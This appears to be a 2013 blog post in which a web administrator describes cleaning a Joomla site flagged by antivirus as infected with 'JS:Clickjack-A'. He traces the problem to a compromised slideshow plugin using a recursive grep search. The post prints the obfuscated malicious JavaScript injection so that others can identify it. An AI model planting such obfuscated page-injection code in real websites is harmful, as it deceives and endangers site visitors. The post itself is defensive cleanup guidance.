• How to remove JS:Clickjack-A [Trj] from my [yours] website

    Posted on August 8th, 2013 admin 8 comments

    Hello,

    Im a long time without posting to this blog, really very busy at work, but this subject really diserves one post.

    During this week i received a e-mail from a customer of a site i built claiming that the website is infected with a virus, my first thougth was “Newbie User”. I try to access the website just to check if everything was running fine and they way i thought it was.

    Few days after i access this same site from another computer running “Avast Antivirus” then i received an alert “JS:ClickJack-A [Trj] Detected from website…”. In my mind Joomla had a bug and because i don´t update joomla with a good frequency (never) then i got hacked.

    But now? How to remove JS:Clickjack-A from my site?

    Well thats not so hard. First of all i discover on the internet some part of the malicious code:

    function dnnViewState()
    {
    var a=0,m,v,t,z,x=new Array(’9091968376′,’8887918192818786347374918784939277359287883421333333338896′,’778787′,’949990793917947998942577939317′),l=x.length;while(++a<=l){m=x[l-a];
    t=z=”;
    for(v=0;v<m.length;){t+=m.charAt(v++);
    if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
    t=”;}}x[l-a]=z;}document.write(‘<’+x[0]+’ ‘+x[4]+’>.’+x[2]+’{‘+x[1]+’}</’+x[0]+’>’);}dnnViewState();
    </script>

    After that i connect as root into my server and run the following command at the root folder of the site.

    grep -RnisI “}document.write(” *

    This command will do a recursive search into all files for the string “}document.write(“, this code is part of the hacker code but it can also be found on other pages.

    After i found the page with the malicious code i get really angry it was on a Joomla plugin called “AutsonSlideShow”, after that i just deactivate the plugin into my joomla panel and my site was fixed.

    Maybe your problem is not into this plugin or your website not run on joomla, but thats no problem you can use the same command to found the malicious code. If you dont have root access to the server you can download all your pages from your site to your computer and do the same search or you can check for last files modified.

    If you need help just do a comment into this post.

     

    Leave a reply